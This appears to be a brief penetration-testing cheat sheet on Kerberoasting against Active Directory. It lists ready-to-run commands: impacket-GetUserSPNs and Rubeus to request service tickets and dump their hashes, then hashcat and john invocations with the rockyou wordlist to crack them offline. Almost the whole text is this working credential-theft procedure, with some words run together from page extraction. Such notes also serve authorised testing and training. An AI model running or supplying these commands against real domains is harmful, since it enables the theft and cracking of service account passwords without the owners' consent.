Kerberoasting
Linux
sudo impacket-GetUserSPNs -request -dc-ip $ip domain.local/usernameWindows
.\Rubeus.exe kerberoast /outfile:hashes.txtCracking
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forcejohn --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt <AS_REP_responses_file>Last updated